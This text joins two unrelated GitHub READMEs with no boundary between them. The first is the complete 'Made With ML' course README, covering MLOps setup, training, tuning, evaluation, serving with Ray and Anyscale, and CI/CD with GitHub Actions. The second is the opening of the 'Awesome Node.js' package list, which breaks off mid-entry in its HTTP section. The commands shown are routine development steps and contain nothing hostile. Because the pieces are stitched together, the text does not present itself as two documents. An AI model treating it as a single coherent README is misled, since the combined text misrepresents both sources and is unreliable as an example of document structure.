<div align="center"> <h1><img width="30" src="https://madewithml.com/static/images/rounded_logo.png">&nbsp;<a href="https://madewithml.com/">Made With ML</a></h1> Design · Develop · Deploy · Iterate <br> Join 40K+ developers in learning how to responsibly deliver value with ML. <br> </div> <br> <div align="center"> <a target="_blank" href="https://madewithml.com/"><img src="https://img.shields.io/badge/Subscribe-40K-brightgreen"></a>&nbsp; <a target="_blank" href="https://github.com/GokuMohandas/Made-With-ML"><img src="https://img.shields.io/github/stars/GokuMohandas/Made-With-ML.svg?style=social&label=Star"></a>&nbsp; <a target="_blank" href="https://www.linkedin.com/in/goku"><img src="https://img.shields.io/badge/style--5eba00.svg?label=LinkedIn&logo=linkedin&style=social"></a>&nbsp; <a target="_blank" href="https://twitter.com/GokuMohandas"><img src="https://img.shields.io/twitter/follow/GokuMohandas.svg?label=Follow&style=social"></a> <br> 🔥&nbsp; Among the <a href="https://github.com/GokuMohandas/Made-With-ML" target="_blank">top ML repositories</a> on GitHub </div> <br> <hr> ## Lessons Learn how to combine machine learning with software engineering to design, develop, deploy and iterate on production-grade ML applications. - Lessons: https://madewithml.com/ - Code: [GokuMohandas/Made-With-ML](https://github.com/GokuMohandas/Made-With-ML) <a href="https://madewithml.com/#course"> <img src="https://madewithml.com/static/images/lessons.png" alt="lessons"> </a> ## Overview In this course, we'll go from experimentation (design + development) to production (deployment + iteration). We'll do this iteratively by motivating the components that will enable us to build a *reliable* production system. <blockquote> <img width=20 src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/09/YouTube_full-color_icon_%282017%29.svg/640px-YouTube_full-color_icon_%282017%29.svg.png">&nbsp; Be sure to watch the video below for a quick overview of what we'll be building. </blockquote> <div align="center"> <a href="https://youtu.be/AWgkt8H8yVo"><img src="https://img.youtube.com/vi/AWgkt8H8yVo/0.jpg" alt="Course overview video"></a> </div> <br> - **💡 First principles**: before we jump straight into the code, we develop a first principles understanding for every machine learning concept. - **💻 Best practices**: implement software engineering best practices as we develop and deploy our machine learning models. - **📈 Scale**: easily scale ML workloads (data, train, tune, serve) in Python without having to learn completely new languages. - **⚙️ MLOps**: connect MLOps components (tracking, testing, serving, orchestration, etc.) as we build an end-to-end machine learning system. - **🚀 Dev to Prod**: learn how to quickly and reliably go from development to production without any changes to our code or infra management. - **🐙 CI/CD**: learn how to create mature CI/CD workflows to continuously train and deploy better models in a modular way that integrates with any stack. ## Audience Machine learning is not a separate industry, instead, it's a powerful way of thinking about data that's not reserved for any one type of person. - **👩‍💻 All developers**: whether software/infra engineer or data scientist, ML is increasingly becoming a key part of the products that you'll be developing. - **👩‍🎓 College graduates**: learn the practical skills required for industry and bridge gap between the university curriculum and what industry expects. - **👩‍💼 Product/Leadership**: who want to develop a technical foundation so that they can build amazing (and reliable) products powered by machine learning. ## Set up Be sure to go through the [course](https://madewithml/#course) for a much more detailed walkthrough of the content on this repository. We will have instructions for both local laptop and Anyscale clusters for the sections below, so be sure to toggle the ► dropdown based on what you're using (Anyscale instructions will be toggled on by default). If you do want to run this course with Anyscale, where we'll provide the **structure**, **compute (GPUs)** and **community** to learn everything in one weekend, join our next upcoming live cohort → [sign up here](https://4190urw86oh.typeform.com/madewithml)! ### Cluster We'll start by setting up our cluster with the environment and compute configurations. <details> <summary>Local</summary><br> Your personal laptop (single machine) will act as the cluster, where one CPU will be the head node and some of the remaining CPU will be the worker nodes. All of the code in this course will work in any personal laptop though it will be slower than executing the same workloads on a larger cluster. </details> <details open> <summary>Anyscale</summary><br> We can create an [Anyscale Workspace](https://docs.anyscale.com/develop/workspaces/get-started) using the [webpage UI](https://console.anyscale.com/o/madewithml/workspaces/add/blank). ```md - Workspace name: `madewithml` - Project: `madewithml` - Cluster environment name: `madewithml-cluster-env` # Toggle `Select from saved configurations` - Compute config: `madewithml-cluster-compute` ``` > Alternatively, we can use the [CLI](https://docs.anyscale.com/reference/anyscale-cli) to create the workspace via `anyscale workspace create ...` </details> <details> <summary>Other (cloud platforms, K8s, on-prem)</summary><br> If you don't want to do this course locally or via Anyscale, you have the following options: - On [AWS and GCP](https://docs.ray.io/en/latest/cluster/vms/index.html#cloud-vm-index). Community-supported Azure and Aliyun integrations also exist. - On [Kubernetes](https://docs.ray.io/en/latest/cluster/kubernetes/index.html#kuberay-index), via the officially supported KubeRay project. - Deploy Ray manually [on-prem](https://docs.ray.io/en/latest/cluster/vms/user-guides/launching-clusters/on-premises.html#on-prem) or onto platforms [not listed here](https://docs.ray.io/en/latest/cluster/vms/user-guides/community/index.html#ref-cluster-setup). </details> ### Git setup Create a repository by following these instructions: [Create a new repository](https://github.com/new) → name it `Made-With-ML` → Toggle `Add a README file` (**very important** as this creates a `main` branch) → Click `Create repository` (scroll down) Now we're ready to clone the repository that has all of our code: ```bash git clone https://github.com/GokuMohandas/Made-With-ML.git . git remote set-url origin https://github.com/GITHUB_USERNAME/Made-With-ML.git # <-- CHANGE THIS to your username git checkout -b dev ``` ### Virtual environment <details> <summary>Local</summary><br> ```bash export PYTHONPATH=$PYTHONPATH:$PWD python3 -m venv venv # recommend using Python 3.10 source venv/bin/activate # on Windows: venv\Scripts\activate python3 -m pip install --upgrade pip setuptools wheel python3 -m pip install -r requirements.txt pre-commit install pre-commit autoupdate ``` > Highly recommend using Python `3.10` and using [pyenv](https://github.com/pyenv/pyenv) (mac) or [pyenv-win](https://github.com/pyenv-win/pyenv-win) (windows). </details> <details open> <summary>Anyscale</summary><br> Our environment with the appropriate Python version and libraries is already all set for us through the cluster environment we used when setting up our Anyscale Workspace. So we just need to run these commands: ```bash export PYTHONPATH=$PYTHONPATH:$PWD pre-commit install pre-commit autoupdate ``` </details> ## Notebook Start by exploring the [jupyter notebook](notebooks/madewithml.ipynb) to interactively walkthrough the core machine learning workloads. <div align="center"> <img src="https://madewithml.com/static/images/mlops/systems-design/workloads.png"> </div> <details> <summary>Local</summary><br> ```bash # Start notebook jupyter lab notebooks/madewithml.ipynb ``` </details> <details open> <summary>Anyscale</summary><br> Click on the Jupyter icon &nbsp;<img width=15 src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/1200px-Jupyter_logo.svg.png">&nbsp; at the top right corner of our Anyscale Workspace page and this will open up our JupyterLab instance in a new tab. Then navigate to the `notebooks` directory and open up the `madewithml.ipynb` notebook. </details> ## Scripts Now we'll execute the same workloads using the clean Python scripts following software engineering best practices (testing, documentation, logging, serving, versioning, etc.) The code we've implemented in our notebook will be refactored into the following scripts: ```bash madewithml ├── config.py ├── data.py ├── evaluate.py ├── models.py ├── predict.py ├── serve.py ├── train.py ├── tune.py └── utils.py ``` **Note**: Change the `--num-workers`, `--cpu-per-worker`, and `--gpu-per-worker` input argument values below based on your system's resources. For example, if you're on a local laptop, a reasonable configuration would be `--num-workers 6 --cpu-per-worker 1 --gpu-per-worker 0`. ### Training ```bash export EXPERIMENT_NAME="llm" export DATASET_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/dataset.csv" export TRAIN_LOOP_CONFIG='{"dropout_p": 0.5, "lr": 1e-4, "lr_factor": 0.8, "lr_patience": 3}' python madewithml/train.py \ --experiment-name "$EXPERIMENT_NAME" \ --dataset-loc "$DATASET_LOC" \ --train-loop-config "$TRAIN_LOOP_CONFIG" \ --num-workers 1 \ --cpu-per-worker 3 \ --gpu-per-worker 1 \ --num-epochs 10 \ --batch-size 256 \ --results-fp results/training_results.json ``` ### Tuning ```bash export EXPERIMENT_NAME="llm" export DATASET_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/dataset.csv" export TRAIN_LOOP_CONFIG='{"dropout_p": 0.5, "lr": 1e-4, "lr_factor": 0.8, "lr_patience": 3}' export INITIAL_PARAMS="[{\"train_loop_config\": $TRAIN_LOOP_CONFIG}]" python madewithml/tune.py \ --experiment-name "$EXPERIMENT_NAME" \ --dataset-loc "$DATASET_LOC" \ --initial-params "$INITIAL_PARAMS" \ --num-runs 2 \ --num-workers 1 \ --cpu-per-worker 3 \ --gpu-per-worker 1 \ --num-epochs 10 \ --batch-size 256 \ --results-fp results/tuning_results.json ``` ### Experiment tracking We'll use [MLflow](https://mlflow.org/) to track our experiments and store our models and the [MLflow Tracking UI](https://www.mlflow.org/docs/latest/tracking.html#tracking-ui) to view our experiments. We have been saving our experiments to a local directory but note that in an actual production setting, we would have a central location to store all of our experiments. It's easy/inexpensive to spin up your own MLflow server for all of your team members to track their experiments on or use a managed solution like [Weights & Biases](https://wandb.ai/site), [Comet](https://www.comet.ml/), etc. ```bash export MODEL_REGISTRY=$(python -c "from madewithml import config; print(config.MODEL_REGISTRY)") mlflow server -h 0.0.0.0 -p 8080 --backend-store-uri $MODEL_REGISTRY ``` <details> <summary>Local</summary><br> If you're running this notebook on your local laptop then head on over to <a href="http://localhost:8080/" target="_blank">http://localhost:8080/</a> to view your MLflow dashboard. </details> <details open> <summary>Anyscale</summary><br> If you're on <a href="https://docs.anyscale.com/develop/workspaces/get-started" target="_blank">Anyscale Workspaces</a>, then we need to first expose the port of the MLflow server. Run the following command on your Anyscale Workspace terminal to generate the public URL to your MLflow server. ```bash APP_PORT=8080 echo https://$APP_PORT-port-$ANYSCALE_SESSION_DOMAIN ``` </details> ### Evaluation ```bash export EXPERIMENT_NAME="llm" export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC) export HOLDOUT_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/holdout.csv" python madewithml/evaluate.py \ --run-id $RUN_ID \ --dataset-loc $HOLDOUT_LOC \ --results-fp results/evaluation_results.json ``` ```json { "timestamp": "June 09, 2023 09:26:18 AM", "run_id": "6149e3fec8d24f1492d4a4cabd5c06f6", "overall": { "precision": 0.9076136428670714, "recall": 0.9057591623036649, "f1": 0.9046792827719773, "num_samples": 191.0 }, ... ``` ### Inference ```bash # Get run ID export EXPERIMENT_NAME="llm" export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC) python madewithml/predict.py predict \ --run-id $RUN_ID \ --title "Transfer learning with transformers" \ --description "Using transformers for transfer learning on text classification tasks." ``` ```json [{ "prediction": [ "natural-language-processing" ], "probabilities": { "computer-vision": 0.0009767753, "mlops": 0.0008223939, "natural-language-processing": 0.99762577, "other": 0.000575123 } }] ``` ### Serving <details> <summary>Local</summary><br> ```bash # Start ray start --head ``` ```bash # Set up export EXPERIMENT_NAME="llm" export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC) python madewithml/serve.py --run_id $RUN_ID ``` While the application is running, we can use it via cURL, Python, etc.: ```bash # via cURL curl -X POST -H "Content-Type: application/json" -d '{ "title": "Transfer learning with transformers", "description": "Using transformers for transfer learning on text classification tasks." }' http://127.0.0.1:8000/predict ``` ```python # via Python import json import requests title = "Transfer learning with transformers" description = "Using transformers for transfer learning on text classification tasks." json_data = json.dumps({"title": title, "description": description}) requests.post("http://127.0.0.1:8000/predict", data=json_data).json() ``` ```bash ray stop # shutdown ``` ```bash export HOLDOUT_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/holdout.csv" curl -X POST -H "Content-Type: application/json" -d '{ "dataset_loc": "https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/holdout.csv" }' http://127.0.0.1:8000/evaluate ``` </details> <details open> <summary>Anyscale</summary><br> In Anyscale Workspaces, Ray is already running so we don't have to manually start/shutdown like we have to do locally. ```bash # Set up export EXPERIMENT_NAME="llm" export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC) python madewithml/serve.py --run_id $RUN_ID ``` While the application is running, we can use it via cURL, Python, etc.: ```bash # via cURL curl -X POST -H "Content-Type: application/json" -d '{ "title": "Transfer learning with transformers", "description": "Using transformers for transfer learning on text classification tasks." }' http://127.0.0.1:8000/predict ``` ```python # via Python import json import requests title = "Transfer learning with transformers" description = "Using transformers for transfer learning on text classification tasks." json_data = json.dumps({"title": title, "description": description}) requests.post("http://127.0.0.1:8000/predict", data=json_data).json() ``` </details> ### Testing ```bash # Code python3 -m pytest tests/code --verbose --disable-warnings # Data export DATASET_LOC="https://raw.githubusercontent.com/GokuMohandas/Made-With-ML/main/datasets/dataset.csv" pytest --dataset-loc=$DATASET_LOC tests/data --verbose --disable-warnings # Model export EXPERIMENT_NAME="llm" export RUN_ID=$(python madewithml/predict.py get-best-run-id --experiment-name $EXPERIMENT_NAME --metric val_loss --mode ASC) pytest --run-id=$RUN_ID tests/model --verbose --disable-warnings # Coverage python3 -m pytest --cov madewithml --cov-report html ``` ## Production From this point onwards, in order to deploy our application into production, we'll need to either be on Anyscale or on a [cloud VM](https://docs.ray.io/en/latest/cluster/vms/index.html#cloud-vm-index) / [on-prem](https://docs.ray.io/en/latest/cluster/vms/user-guides/launching-clusters/on-premises.html#on-prem) cluster you manage yourself (w/ Ray). If not on Anyscale, the commands will be [slightly different](https://docs.ray.io/en/latest/cluster/running-applications/job-submission/index.html) but the concepts will be the same. > If you don't want to set up all of this yourself, we highly recommend joining our [upcoming live cohort](https://4190urw86oh.typeform.com/madewithml){:target="_blank"} where we'll provide an environment with all of this infrastructure already set up for you so that you just focused on the machine learning. <div align="center"> <img src="https://madewithml.com/static/images/mlops/jobs_and_services/manual.png"> </div> ### Authentication These credentials below are **automatically** set for us if we're using Anyscale Workspaces. We **do not** need to set these credentials explicitly on Workspaces but we do if we're running this locally or on a cluster outside of where our Anyscale Jobs and Services are configured to run. ``` bash export ANYSCALE_HOST=https://console.anyscale.com export ANYSCALE_CLI_TOKEN=$YOUR_CLI_TOKEN # retrieved from Anyscale credentials page ``` ### Cluster environment The cluster environment determines **where** our workloads will be executed (OS, dependencies, etc.) We've already created this [cluster environment](./deploy/cluster_env.yaml) for us but this is how we can create/update one ourselves. ```bash export CLUSTER_ENV_NAME="madewithml-cluster-env" anyscale cluster-env build deploy/cluster_env.yaml --name $CLUSTER_ENV_NAME ``` ### Compute configuration The compute configuration determines **what** resources our workloads will be executes on. We've already created this [compute configuration](./deploy/cluster_compute.yaml) for us but this is how we can create it ourselves. ```bash export CLUSTER_COMPUTE_NAME="madewithml-cluster-compute" anyscale cluster-compute create deploy/cluster_compute.yaml --name $CLUSTER_COMPUTE_NAME ``` ### Anyscale jobs Now we're ready to execute our ML workloads. We've decided to combine them all together into one [job](./deploy/jobs/workloads.yaml) but we could have also created separate jobs for each workload (train, evaluate, etc.) We'll start by editing the `$GITHUB_USERNAME` slots inside our [`workloads.yaml`](./deploy/jobs/workloads.yaml) file: ```yaml runtime_env: working_dir: . upload_path: s3://madewithml/$GITHUB_USERNAME/jobs # <--- CHANGE USERNAME (case-sensitive) env_vars: GITHUB_USERNAME: $GITHUB_USERNAME # <--- CHANGE USERNAME (case-sensitive) ``` The `runtime_env` here specifies that we should upload our current `working_dir` to an S3 bucket so that all of our workers when we execute an Anyscale Job have access to the code to use. The `GITHUB_USERNAME` is used later to save results from our workloads to S3 so that we can retrieve them later (ex. for serving). Now we're ready to submit our job to execute our ML workloads: ```bash anyscale job submit deploy/jobs/workloads.yaml ``` ### Anyscale Services And after our ML workloads have been executed, we're ready to launch our serve our model to production. Similar to our Anyscale Jobs configs, be sure to change the `$GITHUB_USERNAME` in [`serve_model.yaml`](./deploy/services/serve_model.yaml). ```yaml ray_serve_config: import_path: deploy.services.serve_model:entrypoint runtime_env: working_dir: . upload_path: s3://madewithml/$GITHUB_USERNAME/services # <--- CHANGE USERNAME (case-sensitive) env_vars: GITHUB_USERNAME: $GITHUB_USERNAME # <--- CHANGE USERNAME (case-sensitive) ``` Now we're ready to launch our service: ```bash # Rollout service anyscale service rollout -f deploy/services/serve_model.yaml # Query curl -X POST -H "Content-Type: application/json" -H "Authorization: Bearer $SECRET_TOKEN" -d '{ "title": "Transfer learning with transformers", "description": "Using transformers for transfer learning on text classification tasks." }' $SERVICE_ENDPOINT/predict/ # Rollback (to previous version of the Service) anyscale service rollback -f $SERVICE_CONFIG --name $SERVICE_NAME # Terminate anyscale service terminate --name $SERVICE_NAME ``` ### CI/CD We're not going to manually deploy our application every time we make a change. Instead, we'll automate this process using GitHub Actions! <div align="center"> <img src="https://madewithml.com/static/images/mlops/cicd/cicd.png"> </div> 1. We'll start by adding the necessary credentials to the [`/settings/secrets/actions`](https://github.com/GokuMohandas/Made-With-ML/settings/secrets/actions) page of our GitHub repository. ``` bash export ANYSCALE_HOST=https://console.anyscale.com export ANYSCALE_CLI_TOKEN=$YOUR_CLI_TOKEN # retrieved from https://console.anyscale.com/o/madewithml/credentials ``` 2. Now we can make changes to our code (not on `main` branch) and push them to GitHub. But in order to push our code to GitHub, we'll need to first authenticate with our credentials before pushing to our repository: ```bash git config --global user.name "Your Name" # <-- CHANGE THIS to your name git config --global user.email [email protected] # <-- CHANGE THIS to your email git add . git commit -m "" # <-- CHANGE THIS to your message git push origin dev ``` Now you will be prompted to enter your username and password (personal access token). Follow these steps to get personal access token: [New GitHub personal access token](https://github.com/settings/tokens/new) → Add a name → Toggle `repo` and `workflow` → Click `Generate token` (scroll down) → Copy the token and paste it when prompted for your password. 3. Now we can start a PR from this branch to our `main` branch and this will trigger the [workloads workflow](/.github/workflows/workloads.yaml). If the workflow (Anyscale Jobs) succeeds, this will produce comments with the training and evaluation results directly on the PR. <div align="center"> <img src="https://madewithml.com/static/images/mlops/cicd/comments.png"> </div> 4. If we like the results, we can merge the PR into the `main` branch. This will trigger the [serve workflow](/.github/workflows/serve.yaml) which will rollout our new service to production! ### Continual learning With our CI/CD workflow in place to deploy our application, we can now focus on continually improving our model. It becomes really easy to extend on this foundation to connect to scheduled runs (cron), [data pipelines](https://madewithml.com/courses/mlops/data-engineering/), drift detected through [monitoring](https://madewithml.com/courses/mlops/monitoring/), [online evaluation](https://madewithml.com/courses/mlops/evaluation/#online-evaluation), etc. And we can easily add additional context such as comparing any experiment with what's currently in production (directly in the PR even), etc. <div align="center"> <img src="https://madewithml.com/static/images/mlops/cicd/continual.png"> </div> ## FAQ ### Jupyter notebook kernels Issues with configuring the notebooks with jupyter? By default, jupyter will use the kernel with our virtual environment but we can also manually add it to jupyter: ```bash python3 -m ipykernel install --user --name=venv ``` Now we can open up a notebook → Kernel (top menu bar) → Change Kernel → `venv`. To ever delete this kernel, we can do the following: ```bash jupyter kernelspec list jupyter kernelspec uninstall venv ```
<div align="center"> <div> <img width="500" src="media/logo.svg" alt="Awesome Node.js"> <br> </div> <br> <br> <br> <br> <hr> <p> <p> <sup> <a href="https://github.com/sponsors/sindresorhus">My open source work is supported by the community</a> </sup> </p> <sup>Special thanks to:</sup> <br> <br> <a href="https://standardresume.co/tech"> <img src="https://sindresorhus.com/assets/thanks/standard-resume-logo.svg" width="160"/> </a> <br> <br> <a href="https://retool.com/?utm_campaign=sindresorhus"> <img src="https://sindresorhus.com/assets/thanks/retool-logo.svg" width="210"/> </a> <br> <br> <a href="https://workos.com/?utm_campaign=github_repo&utm_medium=referral&utm_content=awesome-nodejs&utm_source=github"> <div> <img src="https://sindresorhus.com/assets/thanks/workos-logo-white-bg.svg" width="200" alt="WorkOS"> </div> <b>Your app, enterprise-ready.</b> <div> <sub>Start selling to enterprise customers with just a few lines of code.</sub> <br> <sup>Add Single Sign-On (and more) in minutes instead of months.</sup> </div> </a> <br> <a href="https://strapi.io/?ref=sindresorhus"> <div> <img src="https://sindresorhus.com/assets/thanks/strapi-logo-white-bg.png" width="200" alt="Strapi"> </div> <b>Strapi is the leading open-source headless CMS.</b> <div> <sup>It’s 100% JavaScript, fully customizable, and developer-first.</sup> </div> </a> <br> <br> <a href="https://serpapi.com#gh-light-mode-only"> <div> <img src="https://sindresorhus.com/assets/thanks/serpapi-logo-light.svg" width="130" alt="SerpApi"> </div> <b>API to get search engine results with ease.</b> </a> <a href="https://serpapi.com#gh-dark-mode-only"> <div> <img src="https://sindresorhus.com/assets/thanks/serpapi-logo-dark.svg" width="130" alt="SerpApi"> </div> <b>API to get search engine results with ease.</b> </a> <br> <br> <br> <a href="https://transloadit.com?utm_source=sindresorhus&utm_medium=referral&utm_campaign=sponsorship&utm_content=awesome-nodejs"> <picture> <source width="320" media="(prefers-color-scheme: dark)" srcset="https://sindresorhus.com/assets/thanks/transloadit-logo-dark.svg"> <source width="320" media="(prefers-color-scheme: light)" srcset="https://sindresorhus.com/assets/thanks/transloadit-logo.svg"> <img width="320" src="https://sindresorhus.com/assets/thanks/transloadit-logo.svg" alt="Transloadit logo"> </picture> </a> <br> <br> <br> </p> <hr> <br> <br> <br> <br> <br> <a href="https://awesome.re"> <img src="https://awesome.re/badge-flat2.svg" alt="Awesome"> </a> <p> <sub>Just type <a href="https://node.cool"><code>node.cool</code></a> to go here. Follow me on <a href="https://twitter.com/sindresorhus">Twitter</a>.</sub> </p> <br> <p> <a href="https://en.wikipedia.org/wiki/Node.js">Node.js</a> is an open-source, cross-platform, JavaScript runtime for writing servers and command-line tools. </p> <br> </div> ## Contents - [Official](#official) - [Packages](#packages) - [Mad science](#mad-science) - [Command-line apps](#command-line-apps) - [Functional programming](#functional-programming) - [HTTP](#http) - [Debugging / Profiling](#debugging--profiling) - [Logging](#logging) - [Command-line utilities](#command-line-utilities) - [Build tools](#build-tools) - [Hardware](#hardware) - [Templating](#templating) - [Web frameworks](#web-frameworks) - [Documentation](#documentation) - [Filesystem](#filesystem) - [Control flow](#control-flow) - [Streams](#streams) - [Real-time](#real-time) - [Image](#image) - [Text](#text) - [Number](#number) - [Math](#math) - [Date](#date) - [URL](#url) - [Data validation](#data-validation) - [Parsing](#parsing) - [Humanize](#humanize) - [Compression](#compression) - [Network](#network) - [Database](#database) - [Testing](#testing) - [Security](#security) - [Benchmarking](#benchmarking) - [Minifiers](#minifiers) - [Authentication](#authentication) - [Authorization](#authorization) - [Email](#email) - [Job queues](#job-queues) - [Node.js management](#nodejs-management) - [Natural language processing](#natural-language-processing) - [Process management](#process-management) - [Automation](#automation) - [AST](#ast) - [Static site generators](#static-site-generators) - [Content management systems](#content-management-systems) - [Forum](#forum) - [Blogging](#blogging) - [Weird](#weird) - [Serialization](#serialization) - [Miscellaneous](#miscellaneous) - [Package Manager](#package-manager) - [Resources](#resources) - [Tutorials](#tutorials) - [Discovery](#discovery) - [Articles](#articles) - [Newsletters](#newsletters) - [Videos](#videos) - [Books](#books) - [Blogs](#blogs) - [Courses](#courses) - [Cheatsheets](#cheatsheets) - [Tools](#tools) - [Community](#community) - [Miscellaneous](#miscellaneous-1) - [Related lists](#related-lists) ## Official - [Website](https://nodejs.org) - [Documentation](https://nodejs.org/dist/latest/docs/api/) - [Repository](https://github.com/nodejs/node) ## Packages ### Mad science - [webtorrent](https://github.com/webtorrent/webtorrent) - Streaming torrent client for Node.js and the browser. - [peerflix](https://github.com/mafintosh/peerflix) - Streaming torrent client. - [ipfs](https://github.com/ipfs/js-ipfs) - Distributed file system that seeks to connect all computing devices with the same system of files. - [stackgl](https://github.com/stackgl) - Open software ecosystem for WebGL, built on top of browserify and npm. - [peerwiki](https://github.com/mafintosh/peerwiki) - All of Wikipedia on BitTorrent. - [peercast](https://github.com/mafintosh/peercast) - Stream a torrent video to Chromecast. - [BitcoinJS](https://github.com/bitcoinjs/bitcoinjs-lib) - Clean, readable, proven Bitcoin library. - [Bitcore](https://github.com/bitpay/bitcore) - Pure and powerful Bitcoin library. - [PDFKit](https://github.com/foliojs/pdfkit) - PDF generation library. - [turf](https://github.com/Turfjs/turf) - Modular geospatial processing and analysis engine. - [webcat](https://github.com/mafintosh/webcat) - p2p pipe across the web using WebRTC that uses your GitHub private/public key for authentication. - [NodeOS](https://github.com/NodeOS/NodeOS) - The first operating system powered by npm. - [YodaOS](https://github.com/yodaos-project/yodaos) - AI operating system. - [Brain.js](https://github.com/BrainJS/brain.js) - Machine-learning framework. - [Pipcook](https://github.com/alibaba/pipcook) - Front-end algorithm framework to create a machine learning pipeline. - [Cytoscape.js](https://github.com/cytoscape/cytoscape.js) - Graph theory (a.k.a. network) modeling and analysis. - [js-git](https://github.com/creationix/js-git) - JavaScript implementation of Git. - [xlsx](https://github.com/SheetJS/sheetjs) - Pure JS Excel spreadsheet reader and writer. - [isomorphic-git](https://github.com/isomorphic-git/isomorphic-git) - Pure JavaScript implementation of Git. ### Command-line apps - [np](https://github.com/sindresorhus/np) - Better `npm publish`. - [npm-name](https://github.com/sindresorhus/npm-name) - Check a package name's availability on npm. - [gh-home](https://github.com/sindresorhus/gh-home) - Open the GitHub page of the repo in the current directory. - [npm-home](https://github.com/sindresorhus/npm-home) - Open the npm page of a package. - [trash](https://github.com/sindresorhus/trash) - Safer alternative to `rm`. - [speed-test](https://github.com/sindresorhus/speed-test) - Test your internet connection speed and ping. - [pageres](https://github.com/sindresorhus/pageres) - Capture website screenshots. - [cpy](https://github.com/sindresorhus/cpy) - Copy files. - [vtop](https://github.com/MrRio/vtop) - More better top, with nice charts. - [empty-trash](https://github.com/sindresorhus/empty-trash) - Empty the trash. - [is-up](https://github.com/sindresorhus/is-up) - Check whether a website is up or down. - [is-online](https://github.com/sindresorhus/is-online) - Check if the internet connection is up. - [public-ip](https://github.com/sindresorhus/public-ip) - Get your public IP address. - [clipboard-cli](https://github.com/sindresorhus/clipboard-cli) - Copy & paste on the terminal. - [XO](https://github.com/xojs/xo) - Enforce strict code style using the JavaScript happiness style. - [ESLint](https://github.com/eslint/eslint) - The pluggable linting utility for JavaScript. - [David](https://github.com/alanshaw/david) - Tells you when your package npm dependencies are out of date. - [http-server](https://github.com/http-party/http-server) - Simple, zero-config command-line HTTP server. - [Live Server](https://github.com/tapio/live-server) - Development HTTP-server with livereload capability. - [bcat](https://github.com/kessler/node-bcat) - Pipe command output to web browsers. - [normit](https://github.com/pawurb/normit) - Google Translate with speech synthesis in your terminal. - [fkill](https://github.com/sindresorhus/fkill-cli) - Fabulously kill processes. Cross-platform. - [pjs](https://github.com/danielstjules/pjs) - Pipeable JavaScript. Quickly filter, map, and reduce from the terminal. - [license-checker](https://github.com/davglass/license-checker) - Check licenses of your app's dependencies. - [browser-run](https://github.com/juliangruber/browser-run) - Easily run code in a browser environment. - [tmpin](https://github.com/sindresorhus/tmpin) - Adds stdin support to any CLI app that accepts file input. - [wifi-password](https://github.com/kevva/wifi-password-cli) - Get the current wifi password. - [wallpaper](https://github.com/sindresorhus/wallpaper) - Change the desktop wallpaper. - [pen](https://github.com/hatashiro/pen) - Live Markdown preview in the browser from your favorite editor. - [dark-mode](https://github.com/sindresorhus/dark-mode) - Toggle the macOS Dark Mode. - [Jsome](https://github.com/Javascipt/Jsome) - Pretty prints JSON with configurable colors and indentation. - [mobicon](https://github.com/samverschueren/mobicon-cli) - Mobile app icon generator. - [mobisplash](https://github.com/samverschueren/mobisplash-cli) - Mobile app splash screen generator. - [diff2html-cli](https://github.com/rtfpessoa/diff2html-cli) - Pretty git diff to HTML generator. - [trymodule](https://github.com/victorb/trymodule) - Try out npm packages in the terminal. - [jscpd](https://github.com/kucherenko/jscpd) - Copy/paste detector for source code. - [atmo](https://github.com/Raathigesh/Atmo) - Server-side API mocking. - [auto-install](https://github.com/siddharthkp/auto-install) - Auto installs dependencies as you code. - [lessmd](https://github.com/linuxenko/lessmd) - Markdown in the terminal. - [cost-of-modules](https://github.com/siddharthkp/cost-of-modules) - Find out which dependencies are slowing you down. - [localtunnel](https://github.com/localtunnel/localtunnel) - Expose your localhost to the world. - [svg-term-cli](https://github.com/marionebl/svg-term-cli) - Share terminal sessions via SVG. - [gtop](https://github.com/aksakalli/gtop) - System monitoring dashboard for the terminal. - [themer](https://github.com/themerdev/themer) - Generate themes for your editor, terminal, wallpaper, Slack, and more. - [carbon-now-cli](https://github.com/mixn/carbon-now-cli) - Beautiful images of your code — from right inside your terminal. - [cash-cli](https://github.com/xxczaki/cash-cli) - Convert between 170 currencies. - [taskbook](https://github.com/klaussinani/taskbook) - Tasks, boards & notes for the command-line habitat. - [discharge](https://github.com/brandonweiss/discharge) - Easily deploy static websites to Amazon S3. - [npkill](https://github.com/voidcosmos/npkill) - Easily find and remove old and heavy node_modules folders. ### Functional programming - [lodash](https://github.com/lodash/lodash) - Utility library delivering consistency, customization, performance, & extras. A better and faster Underscore.js. - [immutable](https://github.com/immutable-js/immutable-js) - Immutable data collections. - [Ramda](https://github.com/ramda/ramda) - Utility library with a focus on flexible functional composition enabled by automatic currying and reversed argument order. Avoids mutating data. - [Mout](https://github.com/mout/mout) - Utility library with the biggest difference between other existing solutions is that you can choose to load only the modules/functions that you need, no extra overhead. - [RxJS](https://github.com/reactivex/rxjs) - Functional reactive library for transforming, composing, and querying various kinds of data. - [Kefir.js](https://github.com/kefirjs/kefir) - Reactive library with focus on high performance and low memory usage. ### HTTP - [got](https://github.com/sindresorhus/got) - Nicer interface to the built-in `http` module. - [undici](https://github.com/nodejs/undici) - High performance HTTP client written from scratch with zero dependencies. - [ky-universal](https://github.com/sindresorhus/ky-universal) - Universal HTTP client based on Fetch. - [node-fetch](https://github.com/node-fetch/node-fetch) - `window.fetch` for Node.js. - [axios](https://github.com/axios/axios) - Promise based HTTP client (works in the browser too). - [superagent](https://github.com/visionmedia/superagent) - HTTP request library. - [http-fake-backend](https://github.com/micromata/http-fake-backend) - Build a fake backend by providing the content of JSON files or JavaScript objects through configurable routes. - [cacheable-request](https://github.com/lukechilds/cacheable-request) - Wrap native HTTP requests with RFC compliant cache support. - [gotql](https://github.com/khaosdoctor/gotql) - GraphQL request library built on [got](https://github.com/sindresorhus/got). - [global-agent](https://github.com/gajus/global-agent) - Global HTTP/HTTPS proxy agent that is configurable using environment variables. - 